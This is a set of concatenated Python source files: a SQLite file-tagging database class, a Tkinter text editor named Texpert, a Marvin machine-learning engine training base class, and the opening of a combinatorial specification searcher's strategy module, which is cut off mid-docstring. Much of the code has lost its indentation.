self.db = None
def __enter__(self, *args):
return self.db.__enter__(*args)
def __exit__(self, *args):
return self.db.__exit__(*args)
def remove_file(self, path):
LOGGER.info("untracking file %r", path)
path = from_path(path)
self.db.execute('delete from tags_files where file = ?', (path,))
def remove_tag(self, name):
LOGGER.info("untracking tag %r", name)
self.db.execute('delete from tags_files where tag = ?', (name,))
def rename_tag(self, old, new):
LOGGER.info("renaming tag %r to %r", old, new)
self.db.execute('update tags_files set tag = ? where tag = ?', (new, old))
def rename_file(self, old, new):
LOGGER.info("renaming file %r to %r", old, new)
old = from_path(old)
new = from_path(new)
self.db.execute('update tags_files set file = ? where file = ?', (new, old))
def rename_folder(self, old, new):
LOGGER.info("renaming folder %r to %r", old, new)
old = from_path(old)
new = from_path(new)
# force slashes to avoid matching /aaabbb with /aaa pattern but only /aaa/bbb
old = old + '/'
new = new + '/'
# don't use LIKE in WHERE because old could contain '%' or metacharacters
self.db.execute(
'''
update tags_files
set file = ? || substring(file, ?)
where substring(file, 1, ?) = ?
''',
(new, len(old) + 1, len(old), old)
)
def tag_file(self, path, tags, start=None, end=None):
LOGGER.info("tagging file: %r + %r", path, tags)
if isinstance(tags, str):
tags = [tags]
path = from_path(path)
for tag in tags:
self.db.execute('insert or replace into tags_files (file, tag, start, end) values (?, ?, ?, ?)',
(path, tag, start, end))
def untag_file(self, path, tags):
LOGGER.info("untagging file: %r - %r", path, tags)
if isinstance(tags, str):
tags = [tags]
path = from_path(path)
for tag in tags:
self.db.execute('delete from tags_files where file = ? and tag = ?',
(path, tag))
untrack_file = remove_file
def list_tags(self):
for row in self.db.execute('select distinct tag from tags_files'):
yield row[0]
def list_files(self):
for row in self.db.execute('select distinct file from tags_files'):
yield row[0]
@iter2list
def find_tags_by_file(self, path):
path = from_path(path)
for row in self.db.execute('select distinct tag from tags_files where file = ?', (path,)):
yield row[0]
@iter2list
def find_files_by_tags(self, tags):
if isinstance(tags, str):
tags = [tags]
items = ','.join('?' * len(tags))
params = list(tags) + [len(tags)]
for row in self.db.execute('select file from tags_files where tag in (%s)'
' group by file having count(*) = ?' % items, params):
yield row[0]
@iter2list
def get_extras_for_file(self, path, tag):
path = from_path(path)
for row in self.db.execute('select start, end from tags_files where file = ? and tag = ?',
(path, tag)):
yield row[0], row[1]
def do_migrations(self):
c = self.db.cursor()
c.execute('create table if not exists version (version integer primary key)')
base_version = 0
for row in self.db.execute('select version from version'):
base_version = row[0]
for ver in range(base_version, max(UPGRADES) + 1):
LOGGER.debug("database migration for version %r", ver)
with self.db:
for stmt in UPGRADES[ver]:
self.db.execute(stmt)
self.db.execute('update version set version = ?', (ver + 1,))
# key: version to reach from preceding version
# value: list of statements to execute
UPGRADES = {
0: [
'insert into version values(0)',
'''
create table if not exists tags_files (
file, tag, start, end,
constraint pk_tf primary key(file, tag, start, end)
)
''',
'create index if not exists idx_tags on tags_files (tag)',
'create index if not exists idx_files on tags_files (file)',
],
}
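def _example_round_trip():
    """Usage sketch: a minimal round trip with the Db class above, kept
    in-memory so nothing touches disk. The file path and tags are made up."""
    db = Db()
    db.open(':memory:')
    db.do_migrations()
    with db:
        db.tag_file('/tmp/example.jpg', ['holiday', 'beach'])
    files = db.find_files_by_tags(['holiday', 'beach'])  # -> ['/tmp/example.jpg']
    tags = db.find_tags_by_file('/tmp/example.jpg')
    db.close()
    return files, tags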
|
py | 7df7d82051f88be4a5c53abffbfc8231d7aadacc | #!/usr/bin/python
# Texpert Text Editor
# Written by David Lawson
import os
import sys
import time
try:
import Tkinter as tk
import ScrolledText as tkst
import tkFileDialog
except:
import tkinter as tk
import tkinter.scrolledtext as tkst
import tkinter.filedialog as tkFileDialog
#Mode Colors (mutable)
darkbg, darkfg, darkins = ("#181818", "#F5F5F5", "#F5F5F5")
lightbg, lightfg, lightins = ("#F5F5F5", "#181818", "#181818")
legalbg, legalfg, legalins = ("#FFFFCC", "#181818", "#181818")
nightbg, nightfg, nightins = ("#181818", "#00FF33", "#00FF33")
root = tk.Tk()
root.title("Texpert")
root.geometry("700x500")
root.option_add("*Font", "TkDefaultFont 9")
current_file = None
#Main Frame
mainframe = tk.Frame(root, bd=1, relief='flat')
mainframe.pack(fill='both', expand=True, padx=0, pady=0)
#Text Area
texpert = tkst.ScrolledText(mainframe, undo=True, bd=0, font=("Arial 11"))
texpert.pack(side='bottom', fill='both', expand=True)
texpert.config(padx=2, pady=2, wrap="word", bg=lightbg, fg=lightfg,
insertbackground=lightins)
texpert.focus_set()
#StatusBar
statusbar = tk.Frame(root, bd=1, relief='sunken')
statusbar.pack(side='bottom', fill='x')
mode = tk.Label(statusbar, text=" Mode: Light")
mode.pack(side='left')
line_lbl = tk.Label(statusbar, text="Line 1, Col 1")
line_lbl.pack(side='right', padx=10)
#Menu Functions
#file menu
def new_com(event=None):
root.title("New Document - Texpert")
f = None
texpert.delete('1.0', 'end-1c')
def open_com(event=None):
f = tkFileDialog.askopenfile(parent=root, mode='rb', title="Select File",
filetypes = (("Text Files", "*.txt"),("All Files", "*.*")))
if f:
contents = f.read()
name = root.title((f.name) + " - Texpert")
texpert.delete('1.0', 'end-1c')
texpert.insert('1.0', contents)
f.close()
global current_file
current_file = f.name
def save_com(event=None):
if current_file:
f = open(current_file, "w")
data = texpert.get('1.0', 'end-1c')
f.write(data)
f.close()
else:
saveas_com()
def saveas_com(event=None):
f = tkFileDialog.asksaveasfile(mode='w',
filetypes = (("Text Files", "*.txt"),("All Files", "*.*")))
if f:
data = texpert.get('1.0', 'end-1c')
f.write(data)
f.close()
global current_file
current_file = f.name
#print/print preview not done
def print_com():
print("Printer not found")
def preview_com():
root.geometry("760x800+440+175")
texpert.config(padx=30, pady=8, wrap="word", font=('Arial 10'))
statusbar.pack_forget()
toolbar.pack_forget()
toolbar2.pack(side='top', anchor='n', fill='x')
def close_com(event=None):
root.title("Untitled - Texpert")
f = None
texpert.delete('1.0', 'end-1c')
def exit_com(event=None):
win = tk.Toplevel()
win.title("Exit")
xit = tk.Label(win, text="\nUnsaved work will be lost.\n\nAre you sure you want to exit?\n")
xit.pack()
ex = tk.Button(win, text="Exit", width=4, command=root.destroy)
ex.pack(side='left', padx=24, pady=4)
ex.focus_set()
ex.bind("<Return>", (lambda event: root.destroy()))
can = tk.Button(win, text="Cancel", width=4, command=win.destroy)
can.pack(side='right', padx=24, pady=4)
win.transient(root)
win.geometry('240x120')
win.wait_window()
#for print preview
def nine_font():
texpert.config(font=('Arial 9'))
def tenn_font():
texpert.config(font=('Arial 10'))
def levn_font():
texpert.config(font=('Arial 11'))
def twev_font():
texpert.config(font=('Arial 12'))
def fort_font():
texpert.config(font=('Arial 14'))
#edit menu
def undo_com():
texpert.edit_undo()
def redo_com():
texpert.edit_redo()
def cut_com():
texpert.event_generate("<<Cut>>")
def copy_com():
texpert.event_generate("<<Copy>>")
def paste_com():
texpert.event_generate("<<Paste>>")
def select_all(event=None):
texpert.tag_add('sel', '1.0', 'end-1c')
texpert.mark_set('insert', '1.0')
texpert.see('insert')
return 'break'
#view menu
def tool_bar():
if is_toolbar.get():
toolbar.pack_forget()
else:
toolbar.pack(side='top', anchor='n', fill='x')
def status_bar():
if is_statusbar.get():
statusbar.pack_forget()
else:
statusbar.pack(side='bottom', fill='x')
#modes for: [view > mode]
#tex.config makes note area match
def dark_mode():
mode["text"] = " Mode: Dark"
texpert.config(bg=darkbg, fg=darkfg, insertbackground=darkins)
#tex.config(bg=darkbg, fg=darkfg, insertbackground=darkins)
def light_mode():
mode["text"] = " Mode: Light"
texpert.config(bg=lightbg, fg=lightfg, insertbackground=lightins)
#tex.config(bg=lightbg, fg=lightfg, insertbackground=lightins)
def legal_mode():
mode["text"] = " Mode: Legal"
texpert.config(bg=legalbg, fg=legalfg, insertbackground=legalins)
#tex.config(bg=legalbg, fg=legalfg, insertbackground=legalins)
def night_mode():
mode["text"] = " Mode: Night"
texpert.config(bg=nightbg, fg=nightfg, insertbackground=nightins)
#tex.config(bg=nightbg, fg=nightfg, insertbackground=nightins)
def transparent():
if is_transparent.get():
root.wm_attributes('-alpha', 0.9)
else:
root.wm_attributes('-alpha', 1.0)
def blockcursor():
if is_blockcursor.get():
texpert.config(padx=2, pady=2, wrap="word", blockcursor=True)
else:
texpert.config(padx=2, pady=2, wrap="word", blockcursor=False)
def tray_com():
root.iconify()
def vertical_view():
root.attributes('-zoomed', False)
root.geometry("560x640+440+165")
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
def default_view(event=None):
root.attributes('-zoomed', False)
root.geometry("700x500+440+165")
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
def full_screen(event=None):
root.attributes('-zoomed', True)
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
#tools menu
def time_com():
ctime = time.strftime('%I:%M %p')
texpert.insert('insert', ctime, "a", ' ')
def date_com():
full_date = time.localtime()
day = str(full_date.tm_mday)
month = str(full_date.tm_mon)
year = str(full_date.tm_year)
    date = month + '/' + day + '/' + year
texpert.insert('insert', date, "a", ' ')
def fname():
    if current_file:
        texpert.insert('insert', current_file)
def note_area():
if is_notearea.get():
note_frame.pack(side='right', anchor='e', fill='y')
else:
note_frame.pack_forget()
#help menu
def about_com(event=None):
win = tk.Toplevel()
win.title("About")
bout = tk.Label(win, text="""\n\n\nTexpert
\nA small and lightweight text editor
\nMade in Python with Tkinter\n\n""")
bout.pack()
cre = tk.Button(win, text="Credits", width=4, command=credits_com)
cre.pack(side='left', padx=8, pady=4)
clo = tk.Button(win, text="Close", width=4, command=win.destroy)
clo.pack(side='right', padx=8, pady=4)
win.transient(root)
win.geometry('300x200+638+298')
win.wait_window()
def credits_com():
win = tk.Toplevel()
win.wm_attributes("-topmost", 0)
win.title("Credits")
cred = tk.Label(win, foreground="#404040",
text="""\n\n\nCreated by David Lawson
\n\nme = Person()\nwhile (me.awake()):\nme.code()\n""")
cred.pack()
lic = tk.Button(win, text="License", width=4, command=license_info)
lic.pack(side='left', padx=8, pady=4)
cls = tk.Button(win, text="Close", width=4, command=win.destroy)
cls.pack(side='right', padx=8, pady=4)
win.transient(root)
win.geometry('300x200+638+298')
win.wait_window()
def license_info():
win = tk.Toplevel()
win.wm_attributes("-topmost", 1)
win.title("License")
lic = tk.Label(win, justify='left', text="""\n\nMIT License
Copyright (c) 2019 David Lawson
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF
ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.\n\n""")
lic.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('480x450+550+230')
win.wait_window()
def trouble_com(event=None):
win = tk.Toplevel()
win.title("Troubleshooting")
trouble = tk.Label(win, justify='left', text="""\n\n
This program was designed for Linux and
may not work on other operating systems
(i.e., rendering and/or functionality issues).\n
Texpert text editor is a work in progress
and may or may not ever be completed.\n\n
Known Issues:\n
Line/Col numbers are not fully functional.
Problem remains: unfixed.\n
Print preview is not entirely accurate.\n
Also, (pay attention because this is important)
anything typed in note area will not be saved
as it was not designed/programmed to do so.
\n\nAnyway..\n""")
trouble.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('354x408+612+230')
win.wait_window()
def shortcut_keys(event=None):
win = tk.Toplevel()
win.title("Shortcut Keys")
shortk = tk.Label(win, justify='left',
text="""\n
List of shortcut keys and their functions.\n\n
Menu \tKeys\t\tFunctions\n
File:\tCtrl+N \t\tNew File
\tCtrl+O \t\tOpen File
\tCtrl+S \t\tSave File
\tCtrl+Shift+S\tSave As
\tCtrl+W \t\tClose File
\tCtrl+Q \t\tQuit Program (exit)\n\n
Edit:\tCtrl+Z \t\tUndo
\tCtrl+Shift+Z\tRedo
\tCtrl+X \t\tCut
\tCtrl+C \t\tCopy
\tCtrl+V \t\tPaste
\tCtrl+A \t\tSelect All\n\n
View:\tCtrl+D \t\tDefault Win Size
\tF11 \t\tFullscreen
\tEscape \t\tExit Fullscreen
\n\n""")
shortk.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('380x460+600+230')
win.wait_window()
#context menu (right-click)
def r_click(event):
editmenu.tk_popup(event.x_root, event.y_root)
texpert.bind("<Button-3>", r_click)
#line count (statusbar)
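#index("end-1c") is "line.column" of the last real character; the column is 0-based, hence col = char + 1 below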
def linecount(event):
(line, char) = map(int, event.widget.index("end-1c").split("."))
line_lbl['text'] = 'Line {line}, Col {col}'.format(line=line, col=char + 1)
texpert.bind("<KeyRelease>", linecount)
#Main Menu
menu = tk.Menu(root, bd=1, relief='flat')
root.config(menu=menu, bd=2)
#File
filemenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="File ", menu=filemenu)
filemenu.add_command(label="New",
command=new_com,
accelerator="Ctrl+N".rjust(15))
filemenu.add_command(label="Open",
command=open_com,
accelerator="Ctrl+O".rjust(15))
filemenu.add_separator()
filemenu.add_command(label="Save",
command=save_com,
accelerator="Ctrl+S".rjust(15))
filemenu.add_command(label="Save As",
command=saveas_com,
accelerator="Ctrl+Shift+S")
filemenu.add_separator()
filemenu.add_command(label="Print",
command=print_com, state="disabled")
filemenu.add_command(label="Print Preview",
command=preview_com)
filemenu.add_separator()
filemenu.add_command(label="Close",
command=close_com,
accelerator="Ctrl+W".rjust(15))
filemenu.add_command(label="Exit",
command=exit_com, underline=1,
accelerator="Ctrl+Q".rjust(15))
#Edit
editmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Edit ", menu=editmenu)
editmenu.add_command(label="Undo",
command=undo_com,
accelerator="Ctrl+Z".rjust(15))
editmenu.add_command(label="Redo",
command=redo_com,
accelerator="Ctrl+Shift+Z")
editmenu.add_separator()
editmenu.add_command(label="Cut",
command=cut_com,
accelerator="Ctrl+X".rjust(15))
editmenu.add_command(label="Copy",
command=copy_com,
accelerator="Ctrl+C".rjust(15))
editmenu.add_command(label="Paste",
command=paste_com,
accelerator="Ctrl+V".rjust(15))
editmenu.add_separator()
editmenu.add_command(label="Select All",
command=select_all,
accelerator="Ctrl+A".rjust(15))
#View
viewmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="View ", menu=viewmenu)
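#note: the Toolbar/Statusbar checkbuttons use onvalue=0/offvalue=1, so the traced tool_bar()/status_bar() callbacks show the bar while the menu item is checked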
is_toolbar = tk.BooleanVar()
is_toolbar.trace('w', lambda *args: tool_bar())
viewmenu.add_checkbutton(label="Toolbar",
variable=is_toolbar,
onvalue=0,
offvalue=1)
is_statusbar = tk.BooleanVar()
is_statusbar.trace('w', lambda *args: status_bar())
viewmenu.add_checkbutton(label="Statusbar",
variable=is_statusbar,
onvalue=0,
offvalue=1)
viewmenu.add_separator()
#sub-menu buttons for: [view > mode]
submenu = tk.Menu(menu, tearoff=0)
viewmenu.add_cascade(label="Mode ", menu=submenu)
submenu.add_command(label=" Dark ",
command=dark_mode,
activebackground=darkbg,
activeforeground=darkfg)
submenu.add_command(label=" Light ",
command=light_mode,
activebackground=lightbg,
activeforeground=lightfg)
submenu.add_command(label=" Legal ",
command=legal_mode,
activebackground=legalbg,
activeforeground=legalfg)
submenu.add_command(label=" Night ",
command=night_mode,
activebackground=nightbg,
activeforeground=nightfg)
is_transparent = tk.BooleanVar()
is_transparent.trace('w', lambda *args: transparent())
viewmenu.add_checkbutton(label="Transparency",
variable=is_transparent,
onvalue=1,
offvalue=0)
is_blockcursor = tk.BooleanVar()
is_blockcursor.trace('w', lambda *args: blockcursor())
viewmenu.add_checkbutton(label="Block Cursor",
variable=is_blockcursor,
onvalue=1,
offvalue=0)
viewmenu.add_separator()
viewmenu.add_command(label="Hide in Tray", command=tray_com)
viewmenu.add_separator()
viewmenu.add_command(label="Vertical", command=vertical_view)
viewmenu.add_command(label="Default", command=default_view,
accelerator="Ctrl+D")
viewmenu.add_command(label="Fullscreen", command=full_screen,
accelerator="F11".rjust(8))
#Tools
toolmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Tools ", menu=toolmenu)
toolmenu.add_command(label="Insert Time", command=time_com)
toolmenu.add_command(label="Insert Date", command=date_com)
toolmenu.add_command(label="Insert Path/File", command=fname)
is_notearea = tk.BooleanVar()
is_notearea.trace('w', lambda *args: note_area())
toolmenu.add_checkbutton(label="Note Area", variable=is_notearea)
#Help
helpmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Help ", menu=helpmenu)
helpmenu.add_command(label="About", command=about_com)
helpmenu.add_command(label="Troubleshooting", command=trouble_com)
helpmenu.add_command(label="Shortcut Keys", command=shortcut_keys)
#ToolBar (main)
toolbar = tk.Frame(mainframe, bd=2, relief='groove')
toolbar.pack(side='top', anchor='n', fill='x')
b1 = tk.Button(toolbar, text="Open", width=5, command=open_com)
b1.pack(side='left', padx=4, pady=2)
b2 = tk.Button(toolbar, text="Save", width=5, command=save_com)
b2.pack(side='right', padx=4, pady=2)
b4 = tk.Button(toolbar, text="Notes", width=5,
command=lambda: is_notearea.set(not is_notearea.get()))
b4.pack(side='right', padx=4, pady=2)
#ToolBar 'Mode' button
var = tk.StringVar(toolbar)
var.set("Mode")
w = tk.OptionMenu(toolbar, variable=var, value='')
w.config(indicatoron=0, bd=1, width=7, padx=4, pady=5)
w.pack(side='left', padx=4, pady=2)
first = tk.BooleanVar()
second = tk.BooleanVar()
third = tk.BooleanVar()
fourth = tk.BooleanVar()
w['menu'].delete('0', 'end')
w['menu'].add_checkbutton(label=" Dark ", onvalue=1, offvalue=0,
activebackground=darkbg,
activeforeground=darkfg,
variable=first,
command=dark_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Light ", onvalue=1, offvalue=0,
activebackground=lightbg,
activeforeground=lightfg,
variable=second,
command=light_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Legal ", onvalue=1, offvalue=0,
activebackground=legalbg,
activeforeground=legalfg,
variable=third,
command=legal_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Night ", onvalue=1, offvalue=0,
activebackground=nightbg,
activeforeground=nightfg,
variable=fourth,
command=night_mode,
indicatoron=0)
#Toolbar2 (for print preview)
toolbar2 = tk.Frame(mainframe, bd=2, relief='groove')
b2 = tk.Button(toolbar2, text="Close Preview", width=10, command=default_view)
b2.pack(side='right', padx=28, pady=4)
#Toolbar2 'Zoom' button
var = tk.StringVar()
var.set("Zoom Level")
w2 = tk.OptionMenu(toolbar2, variable=var, value='')
w2.config(indicatoron=0, bd=1, width=12, padx=4, pady=5)
w2.pack(side='left', padx=28, pady=4)
one = tk.BooleanVar()
two = tk.BooleanVar()
three = tk.BooleanVar()
four = tk.BooleanVar()
five = tk.BooleanVar()
w2['menu'].delete('0', 'end')
w2['menu'].add_radiobutton(label=" 60% ".rjust(6), variable="", value=1, command=nine_font)
w2['menu'].add_radiobutton(label=" 75% ".rjust(6), variable="", value=2, command=tenn_font)
w2['menu'].add_radiobutton(label="100% ", variable="", value=3, command=levn_font)
w2['menu'].add_radiobutton(label="125% ", variable="", value=4, command=twev_font)
w2['menu'].add_radiobutton(label="150% ", variable="", value=5, command=fort_font)
#Init Note Area
note_frame = tk.Frame(texpert, bd=0, relief='sunken')
tex = tk.Text(note_frame, width=18, undo=True)
tex.pack(side='top', fill='both', expand=True)
tex.config(padx=2, pady=2, wrap="word", bg=lightbg, fg=lightfg)
tex.insert('1.0', "Notes are not saved..")
clear = tk.Button(note_frame, text="Clear", width=4,
command=lambda: tex.delete('1.0', 'end-1c'))
clear.pack(side='left', padx=2, pady=2)
close = tk.Button(note_frame, text="Close", width=4,
command=lambda: is_notearea.set(not is_notearea.get()))
close.pack(side='right', padx=2, pady=2)
#bindings
root.bind_all('<Control-a>', select_all)
root.bind_all('<Control-n>', new_com)
root.bind_all('<Control-o>', open_com)
root.bind_all('<Control-s>', save_com)
root.bind_all("<Control-Shift-S>", saveas_com)
root.bind_all('<Control-w>', close_com)
root.bind_all('<Control-q>', exit_com)
root.bind_all('<Control-d>', default_view)
root.bind_all('<F11>', full_screen)
root.bind("<Escape>", lambda event: root.attributes("-zoomed", False))
root.protocol("WM_DELETE_WINDOW", exit_com)
root.mainloop()
|
py | 7df7d9fba13aa745bbfaa1021234482a1f5a0f59 | #!/usr/bin/env python
# coding=utf-8
# Copyright [2017] [B2W Digital]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta
from .._compatibility import six
from .._logging import get_logger
from .engine_base_action import EngineBaseBatchAction
__all__ = ['EngineBaseTraining']
logger = get_logger('engine_base_training')
class EngineBaseTraining(EngineBaseBatchAction):
__metaclass__ = ABCMeta
_dataset = None
_model = None
_metrics = None
def __init__(self, **kwargs):
self._dataset = self._get_arg(kwargs=kwargs, arg='dataset')
self._model = self._get_arg(kwargs=kwargs, arg='model')
self._metrics = self._get_arg(kwargs=kwargs, arg='metrics')
super(EngineBaseTraining, self).__init__(**kwargs)
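    # The properties below persist and reload their artifacts through the
    # base-class _save_obj/_load_obj helpers, so dataset, model and metrics
    # can be shared between engine action executions.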
@property
def marvin_dataset(self):
return self._load_obj(object_reference='_dataset')
@marvin_dataset.setter
def marvin_dataset(self, dataset):
self._save_obj(object_reference='_dataset', obj=dataset)
@property
def marvin_model(self):
return self._load_obj(object_reference='_model')
@marvin_model.setter
def marvin_model(self, model):
self._save_obj(object_reference='_model', obj=model)
@property
def marvin_metrics(self):
return self._load_obj(object_reference='_metrics')
@marvin_metrics.setter
def marvin_metrics(self, metrics):
self._save_obj(object_reference='_metrics', obj=metrics)
|
py | 7df7da0536da9f32f268550187d393f9a1651cd8 | """
The Strategy class is essentially following the mantra of 'strategy' from the
combinatorial explanation paper.
(https://permutatriangle.github.io/papers/2019-02-27-combex.html)
In order to use CombinatorialSpecificationSearcher, you must implement a
Strategy. The functions required are:
- decomposition_function: Given a combinatorial class, the decomposition
function should return the tuple of
combinatorial classes it can be counted by. The
function should return None if it doesn't
apply.
- constructor: Return a Constructor class. If you wish to use
CartesianProduct or DisjointUnion, consider
using the CartesianProductStrategy or
DisjointUnionStrategy subclasses.
- formal_step: A short string explaining what was done.
- backward_map: This is the backward mapping of the underlying
bijection of the strategy. If you want to
generate objects, or sample you must implement
this. You can instead raise NotImplementedError
if you don't wish to use these features.
- forward_map: This is the forward mapping of the underlying
bijection. See the discussion for forward map.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
Also included in this file is a StrategyFactory class. This is useful if you
are defining a family of strategies. When the __call__ method is applied to it,
it should return an iterator of Strategy to try and apply to the comb_class.
For a VerificationStrategy you must implement the methods:
- verified: Return True if the combinatorial class is
verified by the strategy.
- pack The pack is used to count and generate the
objects. If the strategy doesn't have a CSS
strategy pack that can be used to enumerate
verified combinatorial classes, then you need
to implement the methods count_objects_of_size,
generate_objects_of_size, and get_genf.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
If your verification strategy is for the atoms, consider using the
AtomStrategy, relying on CombinatorialClass methods.
"""
import abc
from importlib import import_module
from typing import (
TYPE_CHECKING,
Dict,
Generic,
Iterator,
Optional,
Tuple,
Type,
Union,
cast,
)
from sympy import Expr, Function, Integer, var
from ..combinatorial_class import (
CombinatorialClass,
CombinatorialClassType,
CombinatorialObject,
CombinatorialObjectType,
)
from ..exception import InvalidOperationError, ObjectMappingError, StrategyDoesNotApply
from .constructor import CartesianProduct, Constructor, DisjointUnion
from .rule import AbstractRule, Rule, VerificationRule
if TYPE_CHECKING:
from .strategy_pack import StrategyPack
from comb_spec_searcher import CombinatorialSpecification
__all__ = (
"AbstractStrategy",
"CartesianProductStrategy",
"DisjointUnionStrategy",
"Strategy",
"StrategyFactory",
"SymmetryStrategy",
"VerificationStrategy",
)
CSSstrategy = Union["Strategy", "StrategyFactory", "VerificationStrategy"]
def strategy_from_dict(d) -> CSSstrategy:
"""
Return the AbstractStrategy or StrategyFactory from the json representation.
"""
module = import_module(d.pop("class_module"))
StratClass: Type[CSSstrategy] = getattr(module, d.pop("strategy_class"))
assert issubclass(
StratClass, (AbstractStrategy, StrategyFactory)
), "Not a valid strategy"
return StratClass.from_dict(d)
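# Note: from_dict implementations (and this helper) pop entries from the dict
# they receive, so pass a throwaway copy when round-tripping, e.g.
#     strategy_from_dict(dict(strategy.to_jsonable()))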
class AbstractStrategy(
abc.ABC, Generic[CombinatorialClassType, CombinatorialObjectType]
):
"""
A base class for strategies for methods that Strategy and
VerificationStrategy have in common.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
self._ignore_parent = ignore_parent
self._inferrable = inferrable
self._possibly_empty = possibly_empty
self._workable = workable
@abc.abstractmethod
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> AbstractRule[CombinatorialClassType, CombinatorialObjectType]:
"""
Return the rule formed by using the strategy.
"""
@property
def ignore_parent(self) -> bool:
"""
Return True if it is not worth expanding the parent/comb_class if
the strategy applies.
"""
return self._ignore_parent
@property
def inferrable(self) -> bool:
"""
Return True if the children could change using inferral strategies.
"""
return self._inferrable
@property
def possibly_empty(self) -> bool:
"""
Return True if it is possible that a child is empty.
"""
return self._possibly_empty
@property
def workable(self) -> bool:
"""
        Return True if the children can be expanded using other strategies.
"""
return self._workable
@abc.abstractmethod
def can_be_equivalent(self) -> bool:
"""
Return True if every Rule returned with one non-empty child is an
equivalence rule.
"""
@abc.abstractmethod
def decomposition_function(
self, comb_class: CombinatorialClassType
) -> Optional[Tuple[CombinatorialClassType, ...]]:
"""
Return the children of the strategy for the given comb_class. It
should return None if it does not apply.
"""
@abc.abstractmethod
def formal_step(self) -> str:
"""
Return a short string to explain what the strategy has done.
"""
@staticmethod
def get_eq_symbol() -> str:
"""
Return a choice for '=' in the pretty print a '=' b '+' c of rules.
        Your choice should be a single character.
"""
return "="
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
        Your choice should be a single character.
"""
return "+"
def __eq__(self, other: object) -> bool:
if not isinstance(other, AbstractStrategy):
return NotImplemented
return self.__class__ == other.__class__ and self.__dict__ == other.__dict__
def __repr__(self):
return (
self.__class__.__name__
+ f"(ignore_parent={self.ignore_parent}, inferrable={self.inferrable},"
f" possibly_empty={self.possibly_empty}, workable={self.workable})"
)
def __str__(self) -> str:
return self.formal_step()
def to_jsonable(self) -> dict:
"""
Return a dictionary form of the strategy.
"""
c = self.__class__
return {
"class_module": c.__module__,
"strategy_class": c.__name__,
"ignore_parent": self._ignore_parent,
"inferrable": self._inferrable,
"possibly_empty": self._possibly_empty,
"workable": self._workable,
}
@classmethod
@abc.abstractmethod
def from_dict(cls, d: dict) -> CSSstrategy:
return strategy_from_dict(d)
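# Illustrative sketch only (not part of the library): a minimal concrete strategy
# might look roughly like this, where `MyClass` and its `split()` method are
# hypothetical placeholders.
#
#     class MySplitStrategy(DisjointUnionStrategy):
#         def decomposition_function(self, comb_class):
#             return comb_class.split()  # tuple of children, or None
#         def formal_step(self):
#             return "split the class"
#         def forward_map(self, comb_class, obj, children=None):
#             ...  # place obj at the index of the child that contains it
#         @classmethod
#         def from_dict(cls, d):
#             return cls(**d)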
class Strategy(AbstractStrategy[CombinatorialClassType, CombinatorialObjectType]):
"""
The Strategy class is essentially following the mantra of 'strategy' from the
combinatorial explanation paper.
(https://permutatriangle.github.io/papers/2019-02-27-combex.html)
In order to use CombinatorialSpecificationSearcher, you must implement a
Strategy. The functions required are:
- decomposition_function: Given a combinatorial class, the decomposition
function should return the tuple of
combinatorial classes it can be counted by. The
function should return None if it doesn't
apply.
- constructor: Return a Constructor class. If you wish to use
CartesianProduct or DisjointUnion, consider
using the CartesianProductStrategy or
DisjointUnionStrategy subclasses.
- formal_step: A short string explaining what was done.
- backward_map: This is the backward mapping of the underlying
bijection of the strategy. If you want to
generate objects, or sample you must implement
this. You can instead raise NotImplementedError
if you don't wish to use these features.
- forward_map: This is the forward mapping of the underlying
bijection. See the discussion for forward map.
- __repr__ and __str__: This is mostly for printing purposes!
